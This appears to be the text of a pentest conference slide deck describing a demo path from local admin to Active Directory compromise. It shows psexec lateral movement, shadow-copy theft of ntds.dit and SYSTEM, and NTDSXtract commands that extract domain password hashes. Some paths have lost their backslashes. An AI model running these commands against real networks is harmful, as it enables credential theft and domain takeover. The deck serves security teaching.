Fall of a domain | From local admin to Domain user hashes
1. The Fall of a Domain
LOCAL ADMIN TO DOMAIN USER HASHES
Riyaz Walikar
2. Disclaimer
It was far more painstaking and complicated than
this!
Demo setup to show execution path
All the commands were actually used in the pentest
Please do not try this on your office/corporate
environment without written permission
4. The story so far
Remote RDP access to a machine on the client
network via VPN
Local Administrator rights to simulate an employee
User is a limited domain user
Domain controller on the same network, reachable
with LDAP services running
6. Local Admin eh?
Locally logged in as TARDISfwhite
Domain limited user but local admin
Other users connected? [Task Manager > Users]
Found another user connected to our system via
RDP –sweet! (possibly domain admin )
Need system privs! Any ideas?
11. Remote CMD anyone?
RDP directly!
Lets be discreet
psexec -s –u TARDISatomboy 10.10.10.1 cmd.exe
Game already over!
Instead RDP with user credentials and present
report
13. Lets grab some hashes
Active Directory stores user information in
%systemroot%ntdsntds.dit
Locked during system usage
ntdsutil + snapshot = backup (> Windows 2008)
vssadmin create shadow /for=C: (> Windows 2003)
14. Lets grab some hashes
backup readable by nt authoritysystem and
administrators
We need the ntds.dit and SYSTEM files
cd / dir /other inbuilt cmd commands do not work
on unmounted volume shadow copies
copy works!
16. NTDS.dit structure parse?
NTDSXtract - A framework for offline forensic
analysis of ntds.dit
Need the libesedb module as well
libesedb and creddump in ntds_dump_hashes.zip
wget to a linux box (Kali is a good choice)
17. get framework + compile + make + run
wget
http://ntdsxtract.com/downloads/ntdsxtract/ntdsxt
ract_v1_0.zip
wget
http://ntdsxtract.com/downloads/ntds_dump_hash
.zip
unzip both
18. get framework + compile + make + run
cd ntds_dump_hash/libesedb
./configure && make
cd libesedb/esedbtools
./esedbexport -l /tmp/ntds.log <ntds.dit>
19. Yay!
python ../../ntdsxtract/dsusers.py datatable
link_table --passwordhashes <system_file> –
passwordhistory <system_file>
Cleanup the output with ntdstopwdump.py
(https://raw.github.com/inquisb/miscellaneous/mas
ter/ntdstopwdump.py)